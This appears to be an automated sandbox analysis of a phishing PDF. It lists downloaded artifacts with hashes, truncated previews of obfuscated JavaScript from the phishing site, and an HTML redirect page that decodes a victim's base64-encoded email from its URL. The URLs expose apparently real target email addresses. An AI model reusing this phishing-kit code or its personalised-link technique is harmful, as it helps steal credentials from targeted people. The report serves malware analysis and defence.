                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                    Category:dropped
                    Size (bytes):758601
                    Entropy (8bit):7.98639316555857
                    Encrypted:false
                    SSDEEP:
                    MD5:3A49135134665364308390AC398006F1
                    SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                    SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                    SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                    Malicious:false
                    Reputation:unknown
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                    Category:dropped
                    Size (bytes):386528
                    Entropy (8bit):7.9736851559892425
                    Encrypted:false
                    SSDEEP:
                    MD5:5C48B0AD2FEF800949466AE872E1F1E2
                    SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                    SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                    SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                    Malicious:false
                    Reputation:unknown
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:Web Open Font Format (Version 2), TrueType, length 48556, version 1.0
                    Category:downloaded
                    Size (bytes):48556
                    Entropy (8bit):7.995696058489687
                    Encrypted:true
                    SSDEEP:
                    MD5:D4FE31E6A2AEBC06B8D6E558C9141119
                    SHA1:BCDC4F0B431D4C8065A83BB736C56FF6494D0091
                    SHA-256:C88DB2401BEF7E1203E0933CC5525A0F81863BFD076756DB12ACEA5596F089EC
                    SHA-512:1CBE7641B8930163ED3EA348F573CAD438B646ED64D60C1923E5B8664C3DE9C2C21BA97994EC8D886F489E4D090772B010DE72A1167547FB4F6A2D242D46AEC1
                    Malicious:false
                    Reputation:unknown
                    URL:https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/media/a34f9d1faa5f3315.p.woff2
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text, with very long lines (25852), with no line terminators
                    Category:downloaded
                    Size (bytes):25852
                    Entropy (8bit):5.54237326481286
                    Encrypted:false
                    SSDEEP:
                    MD5:4D20A87593E1DE9AFDC5FB97A01A296E
                    SHA1:DAEE7E2BD2091C55CC772E36E2314771F6CCAAF3
                    SHA-256:1B10C59AE7D0B93F12F6C5009D696F30AF1833ED504DAC8A637960B4AA489966
                    SHA-512:97A4EDCE4D8914D75E56B7AB957C52C86541C83233750E1CEACA944DFF869AD5D3B0D8A446384D427663F00400867F51564BC87B59B346BF7CDE2C1FEB56C480
                    Malicious:false
                    Reputation:unknown
                    URL:https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/main-app-653c0408c14c4864.js
                    Preview:var a1_0xc932f3=a1_0x1e75;function a1_0x1e75(_0x34fe66,_0x56cd16){var _0x497597=a1_0x243d();return a1_0x1e75=function(_0x61ed0e,_0x4c60c2){_0x61ed0e=_0x61ed0e-(0x4*0x7c5+0xd3d*-0x1+0x3d*-0x47);var _0xca8c7=_0x497597[_0x61ed0e];if(a1_0x1e75['OMRXIb']===undefined){var _0x48f58e=function(_0x211572){var _0xce8009='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var _0x20ff89='',_0x229065='',_0x5d163d=_0x20ff89+_0x48f58e;for(var _0x2b3cce=0x1*-0x2ad+-0x1bd*-0xf+-0x1766,_0x277bbd,_0x5aeda0,_0x2b70f5=0xe1e*-0x1+0xde7+-0xb*-0x5;_0x5aeda0=_0x211572['charAt'](_0x2b70f5++);~_0x5aeda0&&(_0x277bbd=_0x2b3cce%(-0x180f+-0x3*-0xc5+0x15c4)?_0x277bbd*(-0x25a3+-0x1*0x6e+-0x11*-0x241)+_0x5aeda0:_0x5aeda0,_0x2b3cce++%(0xd*-0x3e+0xf73+-0x1*0xc49))?_0x20ff89+=_0x5d163d['charCodeAt'](_0x2b70f5+(0x65*0x5b+-0x11f1+-0x11ec))-(-0x918+-0x1e44+-0xf6*-0x29)!==-0x2568+-0x1*-0xd13+0x1855?String['fromCharCode'](0xbf9+-0x1cd9+0x4b*0x3d&_0x277bbd>>(-(-0xbd+-0x1946+0x1a05)*_0x2b3cce&-0x10b*-0x1f+0x26b*-0
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:HTML document, ASCII text
                    Category:downloaded
                    Size (bytes):1487
                    Entropy (8bit):4.719723969128962
                    Encrypted:false
                    SSDEEP:
                    MD5:218C66F84E6B32345DEA5E5B28B42EF7
                    SHA1:C24010862824B25386563AA89B66770973C67D7F
                    SHA-256:0278C46C1C78552EC864A565E51C9CDBFD48F56287CABF0F4074D7ED9A040241
                    SHA-512:B52BDAAFF94D7ACBC6144CD4F1666415A5F3472B2FB3B14B32181AA0205D42A699230BC0724CC6A4FC77A413F8372C599CE4B7F3243987F0FD9A0A2672CFB471
                    Malicious:false
                    Reputation:unknown
                    URL:https://khfreightgroup.com/awsfrvc/wsrcfwasdesf/looosafvcsfe/wafcarrfw/?email=YmpvbmVzQGxha2VsYW5kLmNjLmlsLnVz
                    Preview:<!DOCTYPE html>.<html lang="en">.<head>. <meta charset="UTF-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. <title>File loading</title>. <script>. // Function to get the value of a parameter from the URL. function getParameterByName(name, url) {. if (!url) url = window.location.href;. name = name.replace(/[\[\]]/g, "\\$&");. var regex = new RegExp("[?&]" + name + "(=([^&#]*)|&|#|$)"),. results = regex.exec(url);. if (!results) return null;. if (!results[2]) return '';. return decodeURIComponent(results[2].replace(/\+/g, " "));. }.. // Get the base64-encoded email parameter from the URL. var base64EmailParam = getParameterByName('email');.. // Decode the base64-encoded email. function decodeEmail(base64Email) {. return atob(base64Email);. }.. // If a base64-encoded email parameter is provided,
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                    Category:dropped
                    Size (bytes):2077
                    Entropy (8bit):7.857850949804594
                    Encrypted:false
                    SSDEEP:
                    MD5:7146329B3E36F8FC9DEE18EF6F476C60
                    SHA1:776C487A282962E36721485301C7CE0509DE6D79
                    SHA-256:C3D03783AB15F136F25C3704C8ECC248A363FB7A9F0CB199C586AFBB23C0BAA9
                    SHA-512:B17F7C26E4BE5C96D803EF88588C0E6F6A5051D56FEF9EE9BA014DFC8A79F9795AF4DA64CB67D7027B579B80F3D621C8C64D8AF6BD304880E5355977CE2BB361
                    Malicious:false
                    Reputation:unknown
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text, with very long lines (65536), with no line terminators
                    Category:downloaded
                    Size (bytes):804244
                    Entropy (8bit):5.495304620886988
                    Encrypted:false
                    SSDEEP:
                    MD5:6A019D87D11C571AA335391A58D35B1E
                    SHA1:CF3AF1AEEA8BFD0967FD603E25DD78830CAC9F7C
                    SHA-256:DA767CEBC150F1514EF1A77027D8E40CCB85D70AC192C8EC7E533B7DF8B27CE2
                    SHA-512:C93806EDFE88FEE18E60CCCC2E8A7BAA27E4F68BFD307FC0148BE5B666583100BA685D4E7B3DCC1F7A4E3B748148F20872062F856B86FA71998A8893620FDA9E
                    Malicious:false
                    Reputation:unknown
                    URL:https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/23-e33e3d623cf28c17.js
                    Preview:function a12_0x1712(_0x2ae307,_0x4ae18a){const _0x4f7a7e=a12_0x5b45();return a12_0x1712=function(_0x780e16,_0x227731){_0x780e16=_0x780e16-(0x11a6+-0x35f*-0x8+-0x2ab0);let _0x34c187=_0x4f7a7e[_0x780e16];if(a12_0x1712['rXwnNf']===undefined){var _0x2c34d4=function(_0x39074a){const _0x4f565d='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';let _0x22abf1='',_0x1f3652='',_0x59bd67=_0x22abf1+_0x2c34d4;for(let _0x104303=-0x9e*-0x1f+-0xf5*-0x1+-0x1417,_0x5bb26f,_0x539b81,_0x3f7de5=0x4e7+0x23b5+-0x289c;_0x539b81=_0x39074a['charAt'](_0x3f7de5++);~_0x539b81&&(_0x5bb26f=_0x104303%(-0x309*-0xb+-0x2*-0x44b+-0x1d3*0x17)?_0x5bb26f*(0xc2*-0x5+0x1484*0x1+-0x107a)+_0x539b81:_0x539b81,_0x104303++%(-0x1*-0x1387+-0x1e32+0xaaf))?_0x22abf1+=_0x59bd67['charCodeAt'](_0x3f7de5+(-0x42b*0x5+-0x1*0x1519+0x29fa))-(0x18c7*0x1+0x1bac+-0x3469)!==0x1*-0x2b+-0x15c6+0x15f1?String['fromCharCode'](0x1105*0x2+-0x6*-0x3b9+0x1*-0x3761&_0x5bb26f>>(-(-0x3*-0xbd8+-0x722*-0x5+-0x4730)*_0x104303&-0x1c3e+0x188a+0x3
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:HTML document, ASCII text, with very long lines (4226), with no line terminators
                    Category:downloaded
                    Size (bytes):4226
                    Entropy (8bit):5.311581384751288
                    Encrypted:false
                    SSDEEP:
                    MD5:7F47BC7FBE0BB5643CDFB5EB0A402FB4
                    SHA1:379E9894F99385AA04BE326317D3670432093ECC
                    SHA-256:3B40DBD920CC9359E9760BC8258E38613DAF30BFC84CE5D45B080EBDDEDA4D8D
                    SHA-512:EDDAEE63A21C6E7A96FDAE723F6D0EE92DF7CE64BA44039A614E8EE5EF94D73C68602A6F5B0698D2379DE8B650C5CACA86B28B0BE59B45D3FD18835660E50B2E
                    Malicious:false
                    Reputation:unknown
                    URL:https://sdspprfd-tftfrtrghf34f3drrs3.net/?S=jjohns@lakeland.cc.il.us
                    Preview:<!DOCTYPE html><html lang="en"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1"/><link rel="preload" href="/_next/static/media/a34f9d1faa5f3315.p.woff2" as="font" crossorigin="" type="font/woff2"/><link rel="stylesheet" href="/_next/static/css/7b64cd318fb77179.css" data-precedence="next"/><link rel="stylesheet" href="/_next/static/css/f796ea3b426fcf90.css" data-precedence="next"/><link rel="preload" as="script" fetchPriority="low" href="/_next/static/chunks/webpack-20efd41c90b5bcbd.js"/><script src="/_next/static/chunks/fd9d1056-4f5113e8da6db9c7.js" async=""></script><script src="/_next/static/chunks/23-e33e3d623cf28c17.js" async=""></script><script src="/_next/static/chunks/main-app-653c0408c14c4864.js" async=""></script><script src="/_next/static/chunks/92-2a0dad65b64d730c.js" async=""></script><script src="/_next/static/chunks/app/page-c71772bf3bad0174.js" async=""></script><script src="/_next/static/chunks/app/not-found-9fcb5dc5d913bc
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text, with very long lines (26799), with no line terminators
                    Category:downloaded
                    Size (bytes):26799
                    Entropy (8bit):5.533530643838122
                    Encrypted:false
                    SSDEEP:
                    MD5:8DC3D078E42EBF368DD46367D3CF84FC
                    SHA1:C28DFFB7DF74B4F740BF81427B58473EAF64C632
                    SHA-256:18D381F8E6BB6ACB4090DFDD10C01AE45E9F6578EF7B6E89F633253F2C521A61
                    SHA-512:18ADF63821BD9368E90B51436AB24FD6273E1D494C529BB32FC1705CC05AB4B9215A3A42F1A5F8B141CEFE31E6DEEDBBDA563A19F7470FEEFD1960E3618999C5
                    Malicious:false
                    Reputation:unknown
                    URL:https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/app/not-found-9fcb5dc5d913bcdb.js
                    Preview:var a4_0x51fbc7=a4_0x5f34,a4_0x23000f=a4_0x5a84;(function(_0x3b6d94,_0x4b072c){var _0x171ebd=a4_0x5a84,_0x55eda2=a4_0x5f34,_0x7e9f38=_0x3b6d94();while(!![]){try{var _0x5cf496=parseInt(_0x55eda2(0x1b3))/(0xfab+-0x542+0x24*-0x4a)*(-parseInt(_0x171ebd(0x1dd,'0pR^'))/(0x1419+-0x73+0x13a4*-0x1))+parseInt(_0x171ebd(0x154,'2)rF'))/(-0x441*-0x4+0x147b+-0x4*0x95f)+-parseInt(_0x55eda2(0x1f2))/(-0x1481+-0x1c94+0x1*0x3119)*(parseInt(_0x55eda2(0x16a))/(0x35*-0x62+0x80f+0xc40))+-parseInt(_0x55eda2(0x1b7))/(-0x6*0x2cc+-0x2*0x975+-0x5f4*-0x6)*(-parseInt(_0x171ebd(0x1ed,'$Qqy'))/(-0x263e+-0x8cb*0x1+-0x7d8*-0x6))+parseInt(_0x55eda2(0x1c8))/(0x2110+-0x726+-0x19e2)+-parseInt(_0x55eda2(0x1bd))/(0x21ba+0xbf*-0xd+0x53*-0x4a)+-parseInt(_0x55eda2(0x1e7))/(0x671+0x1*0x105f+-0x16c6);if(_0x5cf496===_0x4b072c)break;else _0x7e9f38['push'](_0x7e9f38['shift']());}catch(_0x43d482){_0x7e9f38['push'](_0x7e9f38['shift']());}}}(a4_0x60ef,-0x264b5+-0x58e93+0xbd2a9));var a4_0x549210=(function(){var _0x2f1de0=!![];return fun
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text, with very long lines (15916)
                    Category:downloaded
                    Size (bytes):18209
                    Entropy (8bit):5.157711637837415
                    Encrypted:false
                    SSDEEP:
                    MD5:FBC1D840518919308E492242A3D49EDE
                    SHA1:204507669DD797527D00333E2BEC2DB907CB32AF
                    SHA-256:682478B328444CFE35A64BA8EB7CD7F51C663FDB49334FBBB457EADED9EAEF7D
                    SHA-512:F197C5E2E7A17D3E8ED723F70DF606ACA47E3951A326B02657FACA9477F9D3E00AEDDA65EE8ED566AC551E935DA0D3912CD7996500F690D585678F70D74C8051
                    Malicious:false
                    Reputation:unknown
                    URL:https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/css/7b64cd318fb77179.css
                    Preview:*,:after,:before{--tw-border-spacing-x:0;--tw-border-spacing-y:0;--tw-translate-x:0;--tw-translate-y:0;--tw-rotate:0;--tw-skew-x:0;--tw-skew-y:0;--tw-scale-x:1;--tw-scale-y:1;--tw-pan-x: ;--tw-pan-y: ;--tw-pinch-zoom: ;--tw-scroll-snap-strictness:proximity;--tw-gradient-from-position: ;--tw-gradient-via-position: ;--tw-gradient-to-position: ;--tw-ordinal: ;--tw-slashed-zero: ;--tw-numeric-figure: ;--tw-numeric-spacing: ;--tw-numeric-fraction: ;--tw-ring-inset: ;--tw-ring-offset-width:0px;--tw-ring-offset-color:#fff;--tw-ring-color:rgba(59,130,246,.5);--tw-ring-offset-shadow:0 0 #0000;--tw-ring-shadow:0 0 #0000;--tw-shadow:0 0 #0000;--tw-shadow-colored:0 0 #0000;--tw-blur: ;--tw-brightness: ;--tw-contrast: ;--tw-grayscale: ;--tw-hue-rotate: ;--tw-invert: ;--tw-saturate: ;--tw-sepia: ;--tw-drop-shadow: ;--tw-backdrop-blur: ;--tw-backdrop-brightness: ;--tw-backdrop-contrast: ;--tw-backdrop-grayscale: ;--tw-backdrop-hue-rotate: ;--tw-backdrop-invert: ;--tw-backdrop-opacity: ;--tw-backdrop-
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text, with very long lines (65536), with no line terminators
                    Category:downloaded
                    Size (bytes):271956
                    Entropy (8bit):5.570361264256464
                    Encrypted:false
                    SSDEEP:
                    MD5:DF0306F93D63C8575037525D36D5EC28
                    SHA1:53A5DFE604B624BE8B26429CF1C8AAFD502F1A48
                    SHA-256:60A2ADA8856612216A2EFA74E137EDC8ED205E4E311616E1F7377A8D12B41477
                    SHA-512:4E574A120D8BEADE3D306B7B9A87D545F4D39A1C569DEED6570EC10F15201D435D817FBBB8A4E9FBE20CB2E104AB0D91A1D1FF937754068EFF8C5DEC00969BC8
                    Malicious:false
                    Reputation:unknown
                    URL:https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/app/page-c71772bf3bad0174.js
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text, with very long lines (65536), with no line terminators
                    Category:downloaded
                    Size (bytes):975697
                    Entropy (8bit):5.518704715890913
                    Encrypted:false
                    SSDEEP:
                    MD5:C0E130F57A2968DCE9006BD0A287F7C4
                    SHA1:5C86DCD1413A7DC414662A6246C798332CA48805
                    SHA-256:8260C684AA470B3643FADDB4790DD3C19914C3FCA9193399A5D46FD0B772718D
                    SHA-512:5D140BFF905FB064E616CFE896360C662E884EF4194432F733BF44B79F8630AEA3ACA1DDADB49930789C952E0232A5DCD2CCE79E6C81408EDC77526142B8BB8A
                    Malicious:false
                    Reputation:unknown
                    URL:https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/92-2a0dad65b64d730c.js
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text, with very long lines (52504), with no line terminators
                    Category:downloaded
                    Size (bytes):52504
                    Entropy (8bit):5.517620198240017
                    Encrypted:false
                    SSDEEP:
                    MD5:78F16114DDBA08EF9CECCC78F5D2687C
                    SHA1:7221E9FB9C495CB5C780592DD939D2F2D12F9247
                    SHA-256:9553E0128C18DB4FF381903E30D7BFA2CB7E1551F7F98C478A43DAD6501AA235
                    SHA-512:4FF47041ABA8745266953F09DBC8E7ED36B903457986C28EFE91991747B1E2E1EDC9DC66C66CEAB9B02F5B4829282005F13F537985D65F08E621BE958F1AEC39
                    Malicious:false
                    Reputation:unknown
                    URL:https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/webpack-20efd41c90b5bcbd.js
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text, with very long lines (65536), with no line terminators
                    Category:downloaded
                    Size (bytes):1419622
                    Entropy (8bit):5.436519432289512
                    Encrypted:false
                    SSDEEP:
                    MD5:F898F52850E538C3CCC5840D20088FA4
                    SHA1:B53A3D620F59D9BB3E14F70707206F8F584A2000
                    SHA-256:2B4B86349D1CE0DF01516EC555E37369ECD3F3302F19B9D6E93906909FFABFED
                    SHA-512:82D5D64929489977ED9E0BE5319BB481435B00B1BAC8316F785E7136233E24E8023ACE26E9E7DCFE8599C61A2BAA79A78268804759AFBFD37645C1F4FAF75375
                    Malicious:false
                    Reputation:unknown
                    URL:https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/fd9d1056-4f5113e8da6db9c7.js
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text, with very long lines (612), with no line terminators
                    Category:downloaded
                    Size (bytes):612
                    Entropy (8bit):4.946766275274378
                    Encrypted:false
                    SSDEEP:
                    MD5:0637605D83D35A33BF15BD0EA4F780AB
                    SHA1:A5362A0B0447AEFFF4345D62637B74F95F84958B
                    SHA-256:4DF61D80C041AF80DE45A8C7B05915B2598585D93E9B8004DC87E6B4D4819CC0
                    SHA-512:9E26B535E10AEA91B32D185E62F38F2245287D7E250766783D86DDA3DCBCF12C953A38B5DBFBDD58345324843D2FB29362A054683E09C1955254B04DBD27D5B0
                    Malicious:false
                    Reputation:unknown
                    URL:https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/css/f796ea3b426fcf90.css
                    Preview:.loader,.loading-dots{display:flex;justify-content:center;align-items:center}.loader{width:100%;height:2rem;margin-top:-1rem;margin-bottom:.5rem}.dot{width:.5rem;height:.5rem;background-color:#3b82f6;border-radius:50%;margin:0 .25rem;animation:pulse 1s ease-in-out infinite}@keyframes pulse{0%{transform:scale(.8);opacity:.5}50%{transform:scale(1.2);opacity:1}to{transform:scale(.8);opacity:.5}}@keyframes dot-flashing{0%{opacity:.3}50%,to{opacity:1}}@keyframes loading-bar{0%{width:0;margin-left:0}50%{width:100%;margin-left:0}to{width:0;margin-left:100%}}.animate-loading-bar{animation:loading-bar 2s infinite}
                    File type:PDF document, version 1.4, 2 pages
                    Entropy (8bit):7.923700112314159
                    TrID:
                    • Adobe Portable Document Format (5005/1) 100.00%
                    File name:virus.pdf
                    File size:115'999 bytes
                    MD5:21fc9a2a54d0f2d6d678fc7d18b59822
                    SHA1:de0059b6c1d8f219e6a865cf93dfde46372162fd
                    SHA256:558ec0ecee68675ee63a5b1efc37724f76b4653e831510e1fd3fa4c598c92a4b
                    SHA512:4c6e37ee26e85736377265dd2d72188b47e5e56c170aa50689779be463ceb9de3402e99e6047fed7d104a63d3cc7d306f32e7303ae3eeee24b5e11c0729f561b
                    SSDEEP:3072:zY42NABZQ1NwSw3S7rgsztY42NABZQ1NwSw3S7rgszL:U42h1Nvw3SAD42h1Nvw3SAO
                    TLSH:1CB3E0B8D2F1AC40CEC9C9719A9473907BECF9D3559584E01BE66F4BB9CA4B883005CE
                    File Content Preview:%PDF-1.4.%.....1 0 obj.<</Title (about:blank)./Creator (Mozilla/5.0 \(X11; Linux x86_64\) AppleWebKit/537.36 \(KHTML, like Gecko\) HeadlessChrome/131.0.0.0 Safari/537.36)./Producer (Skia/PDF m131)./CreationDate (D:20250310193950+00'00')./ModDate (D:202503
                    Icon Hash:62cc8caeb29e8ae0

                    General

                    Header:%PDF-1.4
                    Total Entropy:7.923700
                    Total Bytes:115999
                    Stream Entropy:7.924770
                    Stream Bytes:113445
                    Entropy outside Streams:5.182881
                    Bytes outside Streams:2554
                    Number of EOF found:1
                    Bytes after EOF:
                    Name            Count
                    obj             18
                    endobj          18
                    stream          5
                    endstream       5
                    xref            1
                    trailer         1
                    startxref       1
                    /Page           2
                    /Encrypt        0
                    /ObjStm         0
                    /URI            0
                    /JS             0
                    /JavaScript     0
                    /AA             0
                    /OpenAction     0
                    /AcroForm       0
                    /JBIG2Decode    0
                    /RichMedia      0
                    /Launch         0
                    /EmbeddedFile   0
                    ID   DHASH              MD5                                Preview
                    4    0000000000000000   2aca3e3a0628eaab8f6b1f73fdcca5d9
                    8    0000000000000000   2aca3e3a0628eaab8f6b1f73fdcca5d9